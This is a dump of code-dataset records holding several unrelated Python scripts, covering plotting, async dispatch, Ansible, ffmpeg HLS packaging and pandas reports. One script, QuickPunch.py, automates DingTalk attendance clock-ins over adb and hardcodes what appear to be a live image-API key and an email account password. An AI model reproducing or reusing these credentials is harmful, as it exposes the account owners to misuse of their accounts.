pass\r\n","sub_path":"print_solution.py","file_name":"print_solution.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"261071158","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom pygorithm import sorting\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 13 00:53:50 2019\n@author: christophercoram\n\"\"\"\n# Use sorting to organize the amount of players on the team in order by they're jersey number.\n##########################\nplayerNumbers = [32, 57, 23, 16, 56, 4, 1, 24]\n# Class holds functions related to sorting\nclass sort():\n # Sorting function aranges playerNumbers variable from least to greatest\n def sortingPlayers(self):\n for i in range(len(playerNumbers)):\n sorting.bubble_sort.sort(playerNumbers)\n \n # objectx variable contains class sort() to call function\nobjectx = sort()\n\n# Instructions on how to access sorting function in class\nprint(\"To organize player numbers, input Arange: \")\nx = input()\ndef execute():\n # If statement allows user input to call class\n if x == \"Arange\":\n 
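# Tiny illustration of the deepcopy-then-overwrite rendering used in print_solution.py above (the 2x2 grid and solution are made up).\nfrom copy import deepcopy\n\ngrid = [['o', 'o'], ['o', 'o']]\nsoln = {(1, 0): 'A'}  # (x, y) -> block type\nout = deepcopy(grid)\nfor (x, y), block in soln.items():\n    out[y][x] = block  # note the (x, y) to [row][column] swap\n# out == [['o', 'A'], ['o', 'o']]\n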
objectx.sortingPlayers()\n print(\"*************\")\n# execute function allows user input on console\nexecute()\n\n\n\n# Create two charts displaying fanbase opinions over players:\n##########################\n# Bar chart predicting player scores for tonights game\n##########################\nN = 8\nplayerPointNumbers = (30, 22, 3, 19, 26, 8, 13, 14)\nwidth = 0.35\nind = np.arange(N)\n# Class holds functions related to pygorithm\nclass graphOne():\n # playerPoints function will gather data from variable and diplay a 2D chart in console\n def playerPoints(self): \n p1 = plt.bar(ind, playerPointNumbers, width,) \n \n plt.title('Predicted Scores For Tonights Game, 2019')\n plt.xticks(ind, ('Rondo','Kobe','Shaq','Curry','Durrant','Jordan','CP3','Westbrook'))\n plt.yticks(np.arange(0, 50, 20))\n plt.xlabel(\"Players\")\n plt.ylabel(\"Predicted Scores\")\n plt.legend((p1[0], ('Players')))\n plt.show\n # objecty variable contains class graphOne() to call function\nobjecty = graphOne()\n# Instructions on how to access plt conditions in class\nprint(\"To bring up both charts, follow instructions.\")\nprint(\"input Graph One: \")\nx = input()\ndef executeTwo():\n # If statement allows user input to call class\n if x == \"Graph One\":\n objecty.playerPoints()\n print(\"*************\")\n# execute function allows user input on console\nexecuteTwo()\n\n\n\n# Bar Chart of fan opions on most favorite / valuable players\n##########################\n# Fixing random state\nnp.random.seed(19680801)\nplt.rcdefaults()\nfig, ax = plt.subplots()\n# Bar chart data\nplayers = ('Rondo','Kobe','Shaq','Curry','Durrant','Jordan','CP3')\ny_pos = np.arange(len(players))\nplayerNames = 3 + 10 * np.random.rand(len(players))\nerror = np.random.rand(len(players))\nclass graphTwo():\n def favoritePlayers(self):\n ax.barh(y_pos, playerNames, xerr=error, align='center', \n color='green', ecolor='green')\n ax.set_yticks(y_pos)\n ax.set_yticklabels(players)\n ax.invert_yaxis() \n ax.set_xlabel('Favoriblity Rating Out Of Twelve')\n plt.ylabel(\"Player Names\")\n ax.set_title('Most Valuable / Favorite Player, 2019')\n plt.show()\n# objectz variable contains class graphTwo() to call function\nobjectz = graphTwo()\n# Instructions on how to access plt conditions in class\nprint(\"input Graph Three: \")\nx = input()\ndef executeThree():\n # If statement allows user input to call class\n if x == \"Graph Three\":\n objectz.favoritePlayers()\n print(\"*************\")\n# execute function allows user input on console \nexecuteThree()\n","sub_path":"MachineLearning/Sports Data.py","file_name":"Sports Data.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"69774396","text":"from contextlib import asynccontextmanager\n\nimport trio\n\nfrom .utils import aclosed\n\n\nclass Dispatcher:\n\n def __init__(self):\n self._lock = trio.Lock()\n self._send_channels = set()\n\n async def pub(self, event):\n async with self._lock:\n for send_channel in self._send_channels:\n await send_channel.send(event)\n\n @aclosed\n async def sub(self, predicate, task_status=trio.TASK_STATUS_IGNORED):\n async with self._open_channel() as recv_channel:\n task_status.started()\n\n async for event in recv_channel:\n if predicate(event):\n yield event\n\n async def wait(self, predicate, **kwargs):\n async with self.sub(predicate, **kwargs) as events:\n async for event in events:\n return event\n\n @property\n def has_subs(self):\n return len(self._send_channels) != 0\n\n 
@asynccontextmanager\n async def _open_channel(self):\n send_channel, recv_channel = trio.open_memory_channel(0)\n\n async with send_channel, recv_channel:\n async with self._lock:\n self._send_channels.add(send_channel)\n\n try:\n yield recv_channel\n\n finally:\n with trio.CancelScope(shield=True):\n async with self._lock:\n self._send_channels.remove(send_channel)\n","sub_path":"src/async_vk_bot/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"226285927","text":"##############################################################################\n# Import some libraries\n##############################################################################\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d\n\n##############################################################################\n# Some defs\n##############################################################################\n# Custom palette for plotting ################################################\ndef palette():\n colours = {'mnk_purple': [145 / 255, 125 / 255, 240 / 255],\n 'mnk_dgrey': [39 / 255, 40 / 255, 34 / 255],\n 'mnk_lgrey': [96 / 255, 96 / 255, 84 / 255],\n 'mnk_green': [95 / 255, 164 / 255, 44 / 255],\n 'mnk_yellow': [229 / 255, 220 / 255, 90 / 255],\n 'mnk_blue': [75 / 255, 179 / 255, 232 / 255],\n 'mnk_orange': [224 / 255, 134 / 255, 31 / 255],\n 'mnk_pink': [180 / 255, 38 / 255, 86 / 255],\n ####\n 'ggred': [217 / 255, 83 / 255, 25 / 255],\n 'ggblue': [30 / 255, 144 / 255, 229 / 255],\n 'ggpurple': [145 / 255, 125 / 255, 240 / 255],\n 'ggyellow': [229 / 255, 220 / 255, 90 / 255],\n 'gglred': [237 / 255, 103 / 255, 55 / 255],\n 'gglblue': [20 / 255, 134 / 255, 209 / 255],\n 'gglpurple': [165 / 255, 145 / 255, 255 / 255],\n 'gglyellow': [249 / 255, 240 / 255, 110 / 255],\n 'ggdred': [197 / 255, 63 / 255, 5 / 255],\n 'ggdblue': [0 / 255, 94 / 255, 169 / 255],\n 'ggdpurple': [125 / 255, 105 / 255, 220 / 255],\n 'ggdyellow': [209 / 255, 200 / 255, 70 / 255],\n }\n return colours\n\n\n# set rcParams for nice plots ################################################\ndef ggplot_sansserif():\n colours = palette()\n # plt.style.use('ggplot')\n plt.rcParams['font.size'] = 8\n plt.rcParams['font.family'] = 'sans-serif'\n plt.rcParams['font.sans-serif'] = 'DejaVu Sans'\n plt.rcParams['axes.labelsize'] = 8\n plt.rcParams['axes.labelweight'] = 'normal'\n plt.rcParams['xtick.labelsize'] = 8\n plt.rcParams['ytick.labelsize'] = 8\n plt.rcParams['legend.fontsize'] = 10\n plt.rcParams['figure.titlesize'] = 8\n plt.rcParams['lines.color'] = 'white'\n plt.rcParams['text.color'] = colours['mnk_purple']\n plt.rcParams['axes.labelcolor'] = colours['mnk_yellow']\n plt.rcParams['xtick.color'] = colours['mnk_purple']\n plt.rcParams['ytick.color'] = colours['mnk_purple']\n plt.rcParams['axes.edgecolor'] = colours['mnk_lgrey']\n plt.rcParams['savefig.edgecolor'] = colours['mnk_lgrey']\n plt.rcParams['axes.facecolor'] = colours['mnk_dgrey']\n plt.rcParams['savefig.facecolor'] = colours['mnk_dgrey']\n plt.rcParams['grid.color'] = colours['mnk_lgrey']\n plt.rcParams['grid.linestyle'] = ':'\n plt.rcParams['axes.titlepad'] = 6\n\n\n# Set up figure for plotting #################################################\ndef set_figure(name='figure', xaxis='x axis', yaxis='y axis', size=3):\n ggplot_sansserif()\n cs = palette()\n fig1 = plt.figure(name, figsize=(size * np.sqrt(2), 
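# Hedged usage sketch for the Dispatcher class in the dispatcher.py record above; the demo coroutines are illustrative, not from the original repo: one task publishes while another awaits the first matching event.\nimport trio\n\nasync def demo():\n    d = Dispatcher()\n\n    async def producer():\n        await trio.sleep(0.1)\n        await d.pub({'type': 'ready'})\n\n    async with trio.open_nursery() as nursery:\n        nursery.start_soon(producer)\n        event = await d.wait(lambda e: e.get('type') == 'ready')\n        print(event)\n\n# trio.run(demo)\n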
size))\n ax1 = fig1.add_subplot(111)\n fig1.patch.set_facecolor(cs['mnk_dgrey'])\n ax1.set_xlabel(xaxis)\n ax1.set_ylabel(yaxis)\n return ax1, fig1, cs\n\n\n# Save 2d plot with a colourscheme suitable for ppt, as a png ################\ndef PPT_save_2d(fig, ax, name, dpi=600):\n\n # Set plot colours\n plt.rcParams['text.color'] = 'xkcd:black'\n plt.rcParams['savefig.facecolor'] = ((1.0, 1.0, 1.0, 0.0))\n ax.patch.set_facecolor((1.0, 1.0, 1.0, 0.0))\n ax.xaxis.label.set_color('xkcd:black')\n ax.yaxis.label.set_color('xkcd:black')\n ax.tick_params(axis='x', colors='xkcd:black')\n ax.tick_params(axis='y', colors='xkcd:black')\n\n # Loop to check for file - appends filename with _# if name already exists\n f_exist = True\n app_no = 0\n while f_exist is True:\n if os.path.exists(name + '.png') is False:\n ax.figure.savefig(name, dpi=dpi)\n f_exist = False\n print('Base exists')\n elif os.path.exists(name + '_' + str(app_no) + '.png') is False:\n ax.figure.savefig(name + '_' + str(app_no), dpi=dpi)\n f_exist = False\n print(' # = ' + str(app_no))\n else:\n app_no = app_no + 1\n print('Base + # exists')\n\nos.chdir(r\"C:\\local files\\Compiled Data\\Confocal characterisation\")\n\nf_405 = (r\"C:\\local files\\Compiled Data\\Confocal characterisation\\405nm peak.csv\")\nf_458 = (r\"C:\\local files\\Compiled Data\\Confocal characterisation\\458nm peak.csv\")\nf_488 = (r\"C:\\local files\\Compiled Data\\Confocal characterisation\\488nm peak.csv\")\nf_515 = (r\"C:\\local files\\Compiled Data\\Confocal characterisation\\515nm peak.csv\")\nf_543 = (r\"C:\\local files\\Compiled Data\\Confocal characterisation\\543nm peak.csv\")\nf_630 = (r\"C:\\local files\\Compiled Data\\Confocal characterisation\\630nm peak.csv\")\n\nf_Wg = (r\"C:\\local files\\Compiled Data\\Confocal characterisation\\Hg WG.csv\")\n\nfs = [f_405, f_458, f_488, f_515, f_543, f_630]\nlbs = ['405 nm', '458 nm', '488 nm', '515 nm', '543 nm', '630 nm']\ncs = ['xkcd:indigo', 'xkcd:blue', 'xkcd:teal',\n 'xkcd:aquamarine', 'xkcd:green', 'xkcd:red']\nax0, fig0, cs0 = set_figure('spectra', 'wavelength / nm', 'arb.int', 5)\n# for i0,v0 in enumerate(fs):\ni0 = 4\n\t# v0 = fs[i0]\n\ndata = np.genfromtxt(f_Wg, skip_header=36, skip_footer=1, delimiter='\\t')\nx = data[:, 0]\ny = data[:, 1]\n\nx_new = np.linspace(x.min(), x.max(), 130000)\ny_interp = interp1d(x, y, kind='quadratic')\ny_smooth = y_interp(x_new)\nx_max = x_new[np.argmax(y_smooth)]\n# text = ' ' + str(np.round(x_max, 2))\n\nplt.plot(data[:, 0], data[:, 1] / np.max(data[:, 1]),\n '-',\n color=cs[i0],\n label='Epi - WG')\n\t# plt.text(x_max, 1, text)\n\t# plt.plot(x_new, y_smooth / np.max(y_smooth),\n\t# color='xkcd:charcoal')\nax0.set_xlim((500, 580))\n\nax0.legend(loc='upper right', fancybox=True, framealpha=0.5)\nplt.tight_layout()\nplt.show()\n\nax0.legend(loc='upper right', fancybox=True, facecolor=(1.0, 1.0, 1.0, 0.0))\n\nPPT_save_2d(fig0, ax0, '458 nm')\n","sub_path":"Misc file reading/Thorlabs CSS csv read and plot commercial SCM.py","file_name":"Thorlabs CSS csv read and plot commercial SCM.py","file_ext":"py","file_size_in_byte":6233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"54613059","text":"#!/usr/bin/python\n# Copyright: Ansible Project\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 
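# Hedged mini-version of the peak-location trick used in the plotting script above (the data here is synthetic): resample onto a fine grid with interp1d, then take the argmax.\nimport numpy as np\nfrom scipy.interpolate import interp1d\n\nx = np.linspace(0.0, 10.0, 50)\ny = np.exp(-(x - 4.2) ** 2)\nx_new = np.linspace(x.min(), x.max(), 5000)\ny_smooth = interp1d(x, y, kind='quadratic')(x_new)\nprint(x_new[np.argmax(y_smooth)])  # ~4.2\n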
'certified'}\n\n\nDOCUMENTATION = '''\n---\nmodule: elasticsearch_domain_facts\nshort_description: Get information about elasticsearch_domain\ndescription:\n - Module searches for Elasticsearch Domain (clusters)\nversion_added: \"2.7\"\nrequirements: [ boto3 ]\noptions:\n domain_name:\n description:\n - DomainName of the ES cluster.\nextends_documentation_fragment:\n - aws\n'''\n\nEXAMPLES = '''\n- elasticsearch_domain_facts:\n domain_name: example-domain\n'''\n\nRETURN = '''\nelasticsearch_domain\n\nhttps://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/es.html#ElasticsearchService.Client.describe_elasticsearch_domain\n'''\n\n\ntry:\n import botocore\nexcept ImportError:\n pass # caught by AnsibleAWSModule\n\nfrom ansible.module_utils.aws.core import AnsibleAWSModule\nfrom ansible.module_utils._text import to_native\nfrom ansible.module_utils.ec2 import boto3_conn, get_aws_connection_info, ec2_argument_spec, camel_dict_to_snake_dict\n\n\ndef get_elasticsearch_domain(module, client):\n \"\"\"[summary]\n\n [description]\n\n Arguments:\n module {[type]} -- [description]\n client {[type]} -- [description]\n \"\"\"\n try:\n domain_name = module.params.get('domain_name')\n return camel_dict_to_snake_dict(client.describe_elasticsearch_domain(DomainName=domain_name))\n except botocore.exceptions.ClientError as e:\n module.fail_json_aws(e, msg='Unexpected error {0}'.format(to_native(e)))\n\n\ndef main():\n \"\"\"\n Module action handler\n \"\"\"\n argument_spec = ec2_argument_spec()\n argument_spec.update(dict(\n id=dict(),\n domain_name=dict(),\n ))\n\n module = AnsibleAWSModule(argument_spec=argument_spec,\n supports_check_mode=True)\n\n region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)\n client = boto3_conn(\n module,\n conn_type='client',\n resource='es',\n region=region,\n endpoint=ec2_url,\n **aws_connect_kwargs)\n\n # only support pre-constructed domain_name for now\n es_domain = get_elasticsearch_domain(module, client)\n\n module.exit_json(changed=False, ansible_facts={'elasticsearch_domain': es_domain})\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"library/elasticsearch_domain_facts.py","file_name":"elasticsearch_domain_facts.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"67427211","text":"# -*- coding: utf-8 -*-\nimport json\nimport tinify\nimport schedule, requests\nimport os, time, smtplib\nfrom subprocess import run\nfrom datetime import datetime\nfrom email import encoders\nfrom email.mime.base import MIMEBase\nfrom email.mime.multipart import MIMEMultipart # for multi-part messages\nfrom email.mime.text import MIMEText # for the plain-text body\n\n# configure image compression\ntinify.key = 'mhDgfkycPsLfqZyrB5D8TrqlXR8fKPt2'\n\ndef job():\n if (datetime.now().strftime(\"%H:%M\") == \"09:12\"):\n holiday(time.strftime(\"%Y-%m-%d\", time.localtime()), \"clock in\")\n else:\n holiday(time.strftime(\"%Y-%m-%d\", time.localtime()), \"clock out\")\n\n\ndef holiday(time, text):\n url = \"http://tool.bitefu.net/jiari/?d=\" + time\n response = json.loads(requests.get(url).text)\n if (response == 0):\n daka(text)\n else:\n print(\"No need to punch in today\")\n\n\ndef daka(text):\n run(\"adb kill-server\")\n run(\"adb start-server\")\n with os.popen(r'adb shell dumpsys power', 'r') as f:\n content = f.read()\n if 'Display Power: state=OFF' in content:\n print('Screen is off.')\n run(\"adb shell input keyevent 26\")\n run(\"adb shell am force-stop com.alibaba.android.rimet\")\n run(\"adb shell am start -n 
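# Hedged sketch of the boto3 call wrapped by the Ansible module above; the region and domain name are placeholders.\nimport boto3\n\nclient = boto3.client('es', region_name='us-east-1')\ndomain = client.describe_elasticsearch_domain(DomainName='example-domain')\nprint(domain['DomainStatus']['ARN'])\n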
com.alibaba.android.rimet/com.alibaba.android.rimet.biz.LaunchHomeActivity\")\n # time.sleep(10)\n run(\"adb shell screencap -p /sdcard/Download/autojump.png\")\n run(\"adb pull /sdcard/Download/autojump.png .\")\n run(\"adb shell rm /sdcard/Download/autojump.png\")\n tinify.from_file(\"autojump.png\").to_file(\"autojump.png\")\n send_email(text)\n\n\ndef send_email(text):\n msg = MIMEMultipart()\n msg['Subject'] = 'DingTalk auto punch-in' # subject\n msg['From'] = 'autopunch@foxmail.com' # sender\n msg['To'] = '898763215@qq.com' # recipient\n # body text\n part_text = MIMEText('Hello 易大宝' + time.strftime(\"%Y-%m-%d\", time.localtime()) + text + \" punched in successfully\")\n msg.attach(part_text) # add the body to the message\n with open('autojump.png', 'rb') as f:\n # set the attachment's MIME type and filename (png here):\n mime = MIMEBase('image', 'png', filename='tp.png')\n # add the required headers:\n mime.add_header('Content-Disposition', 'attachment', filename='autojump.png')\n mime.add_header('Content-ID', '<0>')\n mime.add_header('X-Attachment-Id', '0')\n # read in the attachment content:\n mime.set_payload(f.read())\n # encode it with Base64:\n encoders.encode_base64(mime)\n # add it to the MIMEMultipart:\n msg.attach(mime)\n # send the mail over SMTP\n smtp = smtplib.SMTP('smtp.qq.com', 25) # connect to the server; SMTP_SSL would be the secure variant\n smtp.login('autopunch@foxmail.com', 'jhsejyfnsblzcbec')\n smtp.sendmail('autopunch@foxmail.com', '898763215@qq.com', msg.as_string()) # send the mail\n print('Mail sent successfully!')\n # delete the screenshot from the computer\n if os.path.exists('autojump.png'):\n os.remove('autojump.png')\n else:\n print('Failed to delete the image!')\n\nif __name__ == '__main__':\n daka(\"\")\n # schedule.every().day.at(\"09:12\").do(job)\n # schedule.every().day.at(\"09:32\").do(job)\n # while True:\n # # start the scheduler loop; run_pending() runs every task that is due\n # schedule.run_pending()\n # time.sleep(1)","sub_path":"QuickPunch.py","file_name":"QuickPunch.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"591964656","text":"import datetime as dt\nimport unittest\n#from .notification import Job, Config, UpworkClient\n\n\nconfig = Config(\"test_configuration.ini\").config\napi_key = config['upwork']['api_key']\napi_secret = config['upwork']['api_secret']\njob_skill = config['upwork']['job_skill']\njob_query = dict(\n skills=[job_skill],\n budget='[100 TO 100000]',\n duration=['week', 'month', 'ongoing']\n)\n\n\nclass TestJob(unittest.TestCase):\n\n def setUp(self):\n self.job = Job(\n \"Expert\", dt.date(2001, 1, 1), \"developers\", \"…\",\n \"Lead Android Developer\",\n \"https://www.upwork.com/job/test\",\n )\n\n def test_init(self):\n self.assertEqual(self.job.budget, \"Expert\")\n self.assertEqual(self.job.date, dt.date(2001, 1, 1))\n\n def test_job_info(self):\n self.assertEqual(str(self.job),\n \"New job: Lead Android Developer \\nType: developers\\n\" +\\\n \"Budget : Expert $ \\nCreated on: 2001-01-01 \" +\\\n \"Informations: … \\nLink: https://www.upwork.com/job/test\"\n )\n\nclass TestConfig(unittest.TestCase):\n\n def setUp(self):\n self.config = config\n\n def test_init(self):\n # self.assertRaises(Exception)\n self.assertEqual(self.config['upwork']['api_key'], api_key)\n self.assertEqual(self.config['upwork']['api_secret'], api_secret)\n\n\nclass TestUpworkClient(unittest.TestCase):\n\n def setUp(self):\n self.upworkclient = UpworkClient(api_key, api_secret)\n\n @unittest.skip(\"Cannot setup because upwork.Client doesn’t exist\")\n def test_search_jobs(self):\n self.assertEqual(self.upworkclient.search_jobs(job_query), \"/Need to fill in here: Does Upwork have a live test 
job?/\")\n","sub_path":"upwork/test_notification.py","file_name":"test_notification.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"387102919","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# Created by airvip on 2018/2/2 17:06.\n\nfrom multiprocessing import Pool\nimport random\nimport time\nimport os\n\ndef p_run(name):\n print(\"%s 号子进程开始工作, ID 为:%s\" % (name, os.getpid()))\n start = time.time()\n time.sleep(random.random()) # 随机休息一点时间\n end = time.time()\n print(\"%s 号子进程用时 %.3f 秒\" % (name, (end - start)))\n\nif __name__ == '__main__': # 在交互式模式下自动执行\n start = time.time()\n print(\"父进程 ID 为 %d\" % os.getpid())\n p = Pool(3)\n for i in range(4):\n # apply方法(阻塞),传入子进程要执行的函数和函数参数(以元组的形式)\n p.apply(p_run, args=(i,))\n p.close() # 关闭pool,不能再添加新的任务\n p.join()\n end = time.time()\n print(\"所有子进程执行结束, 用时 %.3f\" % (end - start))","sub_path":"process_threading/sync_pool.py","file_name":"sync_pool.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"172522674","text":"# 讀取 CSV File\r\n\r\nimport pandas as pd # 引用 pandas 套件並縮寫為 pd \r\n\r\n# Create a Pandas Excel writer using XlsxWriter as the engine.\r\nwriter = pd.ExcelWriter('DDI_Summary.xlsx', engine='xlsxwriter')\r\n\r\n# [匯入 CSV]\r\ndf = pd.read_csv('threats.csv') \r\n\r\n# [產生 DataFrame]\r\nselect_df = pd.DataFrame(df)\r\n\r\ntest_df=select_df.ix[:, \"Source Hostname\"].notnull()\r\n\r\nprint(test_df) # 判斷哪些店名是遺失值 \r\nprint(\"---\") \r\nprint(len(test_df))\r\n\r\n\r\n# [篩選] 根據欄位值。\r\n# Create variable with TRUE if [Detection Severity] is [High]\r\ncond_Severity = df['Detection Severity'] == \"High\"\r\ncond_ProtocolGroup = df['Protocol Group'] == \"HTTP\" #'HTTP','SMTP'\r\n\r\nfiltered_df = select_df[cond_Severity & cond_ProtocolGroup]\r\n\r\n#filtered_df.to_csv('FilteredItems.csv', sep=',', encoding='utf-8')\r\nfiltered_df.to_excel(writer, sheet_name='FilteredItems')\r\n\r\n\r\n# [逐筆顯示]\r\nfor index, row in filtered_df.iterrows():\r\n \tprint(row['Date/Timestamp'], row['Detection Severity'], row['Threat Description'])\r\n \r\nprint(\"---\") \r\n \r\nprint(len(filtered_df))\r\n\r\n# [Distinct 特定欄位]\r\n#groupby_df = df.groupby('Detection Severity')['Date/Timestamp'].nunique()\r\ngroupby_df = df.groupby('Threat Description')['Date/Timestamp'].nunique()\r\n\r\n# groupby_df = df['Detection Severity'].value_counts().nunique()\r\n\r\nprint(\"---\") \r\nprint(groupby_df)\r\n\r\n#groupby_df.to_csv('ThreatType.csv', sep=',', encoding='utf-8')\r\n\r\n# Convert the dataframe to an XlsxWriter Excel object.\r\ngroupby_df.to_excel(writer, sheet_name='ThreatType')\r\n\r\n\r\n# Close the Pandas Excel writer and output the Excel file.\r\nwriter.save()","sub_path":"CSV/readExportXlsx.py","file_name":"readExportXlsx.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"1785267","text":"#!/usr/bin/env python3\n\nimport os\nimport subprocess\nimport shlex\nimport sys\nimport time\n\nimport arg_fu\nimport dashed\nimport settings\nimport subtitle\nfrom variants import variants as variants\n\n# -hls_*\ndef hls_opts(top_level,variant):\n hls_opts=\"\"\n for k,v in settings.hls.items(): hls_opts+=\" -%s %s \"%(k,v)\n return hls_opts\n\n# for output file for ffmpeg command\ndef index_m3u8(top_level,variant):\n m3u8path 
=\"%s/%s/index.m3u8\"%(top_level,variant[\"name\"])\n try: m3u8path=settings.hls['hls_base_url']+m3u8path\n except: pass\n return m3u8path\n\n# variant path for master.m3u8\ndef mk_variant_path(variant):\n return \"%s/index.m3u8\"%(variant[\"name\"])\n\n# variants are placed in subdirectories by name ex. med960/index.m3u8 is the med960 variant\ndef mk_subdir(top_level,v_name):\n try: os.mkdir(\"%s/%s\"%(top_level,v_name))\n except: pass\n\ndef mk_top_level(infile):\n settings.top_level=infile.split(\".\")[0].split(\"/\")[-1].strip()\n if not settings.top_level in os.listdir('.'): os.mkdir(settings.top_level)\n\ndef m3u82master(asp,bw):\n m='#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=%s,RESOLUTION=%s,CODECS=\"avc1.42e00a,mp4a.40.2\"\\n'%(bw,asp)\n if settings.subfile: m='%s,SUBTITLES=\"webvtt\"\\n'%m.replace(\"\\n\",'')\n return m\n\n# sort by bandwidth for the master.m3u8, smaller variants go first\ndef bw_sort(all_variants):\n sorted=[]\n bwlist=[]\n for v in all_variants: bwlist.append(variants[v]['bandwidth'])\n bwlist.sort()\n for b in bwlist:\n for v in all_variants: \n if variants[v]['bandwidth']==b: sorted.append(v)\n sorted.reverse()\t \n return sorted\n\n# previously encoded variants are added to the master.m3u8 as well.\ndef scan_for_variants(top_level):\n all_variants=[]\n vlist=variants.keys()\n dirlist=os.listdir(top_level)\n for v in vlist:\n if v in dirlist: all_variants.append(v)\n all_variants=bw_sort(all_variants)\n print(\"\\tvariants found %s\"%\" \".join(all_variants))\n return all_variants\n\ndef mk_subs(top_level,variant):\n for i in os.listdir(\"%s/%s\"%(top_level,variant)):\n if i.endswith(\"vtt\") or i.endswith(\"vtt.m3u8\"):\n os.renames(\"%s/%s/%s\"%(top_level,variant,i),\"%s/subs/%s\"%(top_level,i))\n\ndef mk_master():\n '''\n write master.m3u8\n '''\n print(\"Writing master.m3u8\")\n all_variants=scan_for_variants(settings.top_level)\n master=open('%s/master.m3u8'%settings.top_level,'w')\n master.write(\"#EXTM3U \\n\")\n if settings.subfile:\n print(\"Adding subtitles\")\n master.write('#EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID=\"webvtt\",NAME=\"English\",DEFAULT=YES,AUTOSELECT=YES,FORCED=NO,LANGUAGE=\"en\",URI=\"subs/vtt_index.m3u8\"\\n')\n for variant in all_variants:\n if settings.subfile: mk_subs(settings.top_level,variant)\n v=variants[variant]\n vpath=mk_variant_path(v)\n m=m3u82master(v['aspect'],v['bandwidth'])\n master.write(m)\n master.write(vpath+\"\\n\")\n master.close()\n\ndef mk_switches(v):\n '''\n generate switches for ffmpeg\n '''\n tl=settings.top_level\n st=settings\n sw = [ dashed.i(v['infile'],st.subfile), \n\tdashed.vf(v['aspect']), dashed.cv(st.vcodec),dashed.bv(v['vbitrate']), \n\t dashed.maxrate(v['maxrate']), dashed.ba(v['abitrate']), \n\tdashed.meta(), hls_opts(tl,v),index_m3u8(tl,v)]\n return sw\n\ndef mk_ffcmd(variant):\n '''\n Assemble the ffmpeg command\n '''\n ffcmd=\"ffmpeg -threads 0\"\n v=variants[variant]\n mk_subdir(settings.top_level,v['name'])\n switches=mk_switches(v)\n ffcmd=\"%s %s\"%(ffcmd,\" \".join(switches))\n return ffcmd\n\ndef mk_variant(variant):\n print(\"Starting variant %s\"%variant)\n variants[variant]['infile']=settings.infile\n ffcmd=mk_ffcmd(variant)\n subprocess.call(shlex.split(ffcmd))\n \n\ndef mk_all():\n '''\n loop through variants and assemble the ffmpeg command\n '''\n if settings.req_variants==\"all\":\n settings.req_variants=list(variants.keys())\n for variant in settings.req_variants:\n mk_variant(variant) \n mk_master()\n \ndef set_infile(infile=None):\n infile=infile.strip()\n if infile:\n 
settings.infile=infile\n mk_top_level(infile)\n else:\n print(\"set infile with -i video.file\")\n sys.exit()\n\ndef set_subfile(subfile=None):\n if subfile: \n settings.subfile=subfile.strip()\n if settings.subfile:\n sd=subtitle.Decoder(settings.subfile)\n settings.subfile=sd.outfile\t\n return\n\ndef set_variants(req_list=\"all\"):\n if req_list ==\"all\":\n settings.req_variants=list(variants.keys())\n else:\n settings.req_variants=[]\n req_list=req_list.split(\" \")\n for rv in req_list:\n if rv in list(variants.keys()): settings.req_variants.append(rv)\n return \n\ndef show_variants():\n for v in list(variants.keys()): \n print(v)\n for k,v in variants[v].items():\n print(k ,' ',v)\n return\n\nif __name__ == '__main__':\n settings.req_variants=\"all\"\n arg_fu.add_action('-i', set_infile,'set input video file')\n arg_fu.add_action('-s', set_subfile,'set subtitle input file')\n arg_fu.add_action('--variants', set_variants,'Specify variant list')\n arg_fu.add_action('--show', show_variants,' Show available variants')\n arg_fu.process(ordered=['-h','--help','-i','-s','--variants','--show'])\n mk_all()\n\n","sub_path":"manifesto.py","file_name":"manifesto.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"237900146","text":"import kdd\nfrom wisardpkg import DataSet, RegressionWisard, SimpleMean\nimport time\n\nfiles = open(\"ntuple-test.txt\", \"w+\")\n\nds_train = DataSet()\n\nds = DataSet(\"DS_train.wpkds\")\n\nfor i in range(0, len(ds)):\n ds_train.add(ds.get(i), ds.getY(i))\n\nds_test = DataSet(\"DS_test.wpkds\")\n\nfor i in range(1, 11):\n for address in range(5, 32):\n t_train = time.time()\n rew = RegressionWisard(address, mean = SimpleMean(), orderedMapping=True, completeAddressing=True)\n rew.train(ds_train)\n t_train = time.time() - t_train\n t_test = time.time()\n out = rew.predict(ds_test)\n t_test = time.time() - t_test\n kdd.create_output_file(out, \"ntuple\")\n files.write(\"address: \" + str(address) + \"; training time: \" + str(t_train) + \"; test time: \" + str(t_test) + 